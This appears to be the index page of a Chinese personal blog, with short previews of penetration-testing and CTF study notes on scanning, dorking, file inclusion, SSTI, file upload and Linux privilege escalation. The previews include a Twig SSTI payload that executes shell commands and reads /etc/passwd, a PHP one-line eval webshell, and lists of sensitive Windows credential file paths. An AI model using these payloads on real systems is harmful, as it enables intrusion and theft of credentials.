清风徐来
首页
文章分类
文章归档
清风徐来
文章
39
标签
0
评论
1
首页
文章分类
文章归档
密码本
发布于 2021-05-18
|
更新于 1 个月前
用户口令
|
0
评论
密码本wordlist简介1、wordlist简称单词表,也可叫密码字典,此工具包含了很多密码2、字典目录路径:/usr/share/wordlist/3、dirb (目录扫描)big.txt #大的字典small.txt #小的字典catala.txt #项目配置字典common.txt #公共字
子域名查找
发布于 2021-05-18
|
更新于 1 个月前
信息收集
|
0
评论
子域名查找digdig命令说明查询DNS包括NS记录,A记录,MX记录等相关信息的工具。DNS 记录的类型说明类型A记录: A记录是指定域名对应的IP地址。类型AAAA记录:该记录是将域名解析到一个指定的IPV6的IP上类型CNAME记录:通常称别名解析。可以将注册的不同域名都转到一个域名记录上,由
目录扫描
发布于 2021-05-18
|
更新于 1 个月前
信息收集
|
0
评论
dirb简介dirb是一个基于字典的web目录扫描工具,会用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站参数格式:dirb <url_base> [<wordlist_file(s)>] [options]-a 设置user-agent-p <p
端口扫描
发布于 2021-05-18
|
更新于 1 个月前
信息收集
|
0
评论
nmap常用命令nmap -sS -sV -p- xxx.xxx.xxx.xxxnmap -v -T4 -A xxx.xxx.xxx.xxxnmap -sT 192.168.96.4 //TCP连接扫描,不安全,慢nmap -sS 192.168.96.4 //SYN扫描,使用最频繁,安全,快n
查询语句
发布于 2021-05-18
|
更新于 1 个月前
信息收集
|
0
评论
谷歌语法intitle搜索关键词(intitle:variation)只搜索网页标题含有关键词的页面。inurl搜索关键词(intitle:variation)只搜索网页链接含有关键词的页面。intext搜索关键词(intext:variation)只搜索网页body标签中的文本含有关键词的页面。s
文件包含
发布于 2021-05-18
|
更新于 1 个月前
WEB
|
0
评论
常见的敏感信息路径Windows系统c:\boot.ini // 查看系统版本c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件c:\windows\repair\sam // 存储Windows系统初次安装的密码c:\ProgramFiles\m
SSTI注入
发布于 2021-05-18
|
更新于 1 个月前
WEB
|
0
评论
phptwig{{self.env.registerUndefinedFilterCallback("exec")}}{{self.env.getFilter("cat /flag")}}{{'/etc/passwd'|file_excerpt(1,30)}}
文件上传
发布于 2021-05-18
|
更新于 1 个月前
WEB
|
0
评论
PHP一句话木马经典语句<?php @eval($_POST['cmd']);?>其中:(1) @ 为错误抑制符号(2) eval 执行php代码(3) $_POST['cmd'] 通过post接收的数据意思为eval把接受的数据当做php代码执行其他函数create_function
命令执行
发布于 2021-05-18
|
更新于 1 个月前
WEB
|
0
评论
命令执行绕过拼接符号过滤在linux中,&和&&,|和||介绍如下: & 表示任务在后台执行,如要在后台运行redis-server,则有 redis-server & && 表示前一条命令执行成功时,才执行后一条命令 ,如 echo '1
Linux提权
发布于 2021-05-18
|
更新于 1 个月前
内网渗透
|
0
评论
suid提权Linux可执行文件包括: Nmap, Vim, find, Bash, More, Less, Nano, cp1、这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。fin
1
2
3